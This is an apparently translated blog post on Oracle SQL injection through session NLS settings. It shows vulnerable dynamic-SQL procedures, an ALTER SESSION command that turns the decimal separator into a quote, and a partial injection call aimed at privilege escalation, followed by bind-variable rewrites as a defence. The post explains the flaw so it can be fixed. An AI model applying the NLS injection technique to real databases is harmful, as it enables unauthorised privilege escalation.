Personal opinion

  • 2020-06-07 05:28:51
  • OfStack

If the SQL statement is executed directly with parameter binding, there is not much to worry about. Take the Oracle stored procedure below:
create or replace procedure kjdatepoc(d date)
as
begin
  -- static SQL: the DATE parameter is bound, never rendered into the statement text
  insert into kjdatetable values(d);
  commit;
end;

There is no need to worry about the newer SQL injection attack here. So where can DATE and NUMBER injection happen? Generally where dynamic SQL is built without parameter binding, for example with DBMS_SQL or EXECUTE IMMEDIATE, both of which engineers use routinely.

Look at the following stored procedure:

create or replace procedure kjdatepoc(d date)
as
begin
  -- dynamic SQL: the DATE is converted to text with the session's NLS_DATE_FORMAT
  -- and spliced into the statement
  execute immediate 'insert into kjdatetable values('|| d ||')';
  commit;
end;

If a stored procedure or function like the one above is encountered, the value of NLS_DATE_FORMAT in the session can be modified to achieve SQL injection.

The overseas paper on this is very detailed, so I won't rehash it here.

NUMBER injection, however, got little explanation there beyond showing that a single quote can be produced.

Look at the following statements:

-- the decimal separator becomes a single quote (the group separator is not legible on the page and is assumed to be '.')
ALTER SESSION SET NLS_NUMERIC_CHARACTERS = '''.';
SELECT to_number(1000.10001, '999999D99999') FROM DUAL;

The output is one row:

1000'10001

Just one extra single quote, so what is the point? Well, in certain situations it is valuable. Look at the following stored procedure:

create or replace procedure NumInjPoc(kjexpnum number, kjexpstr varchar2)
is
  SecStr varchar2(1000);
begin
  -- escape single quotes in the VARCHAR2 argument by doubling them
  SecStr := replace(kjexpstr, '''', '''''');
  -- the NUMBER argument is concatenated as-is, i.e. rendered with the session's NLS_NUMERIC_CHARACTERS
  sys.dbms_output.put_line('SELECT * FROM DUAL WHERE ID=' || kjexpnum || ' and name=''' || SecStr || '''');
end;

The VARCHAR2 argument is escaped internally by that replace. Let's test it:

begin
  numinjpoc(1000, '''');   -- pass a single quote as the string argument
end;

The SQL statement it prints is:

SELECT * FROM DUAL WHERE ID=1000 and name=''''

The single quote has been escaped.

So how do we combine this with the NUMBER argument?

ALTER SESSION SET NLS_NUMERIC_CHARACTERS = '''.';
begin
  -- the NUMBER is rendered with the session's decimal separator, which is now a single quote;
  -- the rest of the string argument is not legible on the page
  numinjpoc(TO_NUMBER(0.10001, '999999D99999'), '||kj.exp()...');
end;

Look at the output:

SELECT * FROM DUAL WHERE ID='10001 and name='||kj.exp()...

So the procedure can be attacked indirectly.

Because it requires the cooperation of ALTER SESSION to some degree, this is mainly useful for attacking a function or procedure inside the database in order to escalate privileges. It is not a good way to break in, and for result-driven single-statement SQL injection this approach does not achieve much.
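For completeness, here are the DATE and NUMBER procedures from above rewritten so that a session's NLS_DATE_FORMAT or NLS_NUMERIC_CHARACTERS cannot alter the SQL text. This is an added example, not code from the original post; kjdatetable is the post's table, while kjsafe_table, the *_safe procedure names and num_to_sql are constructed here.

```sql
-- Added example, not from the original post. kjsafe_table, *_safe and num_to_sql are constructed names.
create table kjsafe_table (id number, name varchar2(100));

-- DATE: bind the parameter instead of concatenating it. The value reaches the SQL engine
-- as a DATE and is never rendered as text, so NLS_DATE_FORMAT plays no role.
create or replace procedure kjdatepoc_safe(d date)
as
begin
  execute immediate 'insert into kjdatetable values(:d)' using d;
  commit;
end;
/

-- NUMBER + VARCHAR2: bind both. No implicit number-to-text conversion happens, so
-- NLS_NUMERIC_CHARACTERS cannot turn the decimal separator into a quote, and the manual
-- quote doubling from NumInjPoc is no longer needed.
create or replace procedure numinjpoc_safe(kjexpnum number, kjexpstr varchar2)
is
  v_count pls_integer;
begin
  execute immediate
    'select count(*) from kjsafe_table where id = :1 and name = :2'
    into v_count using kjexpnum, kjexpstr;
  sys.dbms_output.put_line('matching rows: ' || v_count);
end;
/

-- If the statement text really must be assembled by concatenation, convert the NUMBER
-- with an explicit NLS parameter so the session setting is ignored ('.' decimal, ',' group).
create or replace function num_to_sql(n number) return varchar2
is
begin
  return to_char(n, 'TM9', 'NLS_NUMERIC_CHARACTERS = ''.,''');
end;
/

-- Check with the post's session change in effect (decimal separator set to a single quote):
-- the explicit conversion still renders the digits with '.' and contains no quote.
ALTER SESSION SET NLS_NUMERIC_CHARACTERS = '''.';
select num_to_sql(to_number(0.10001, '999999D99999')) from dual;
```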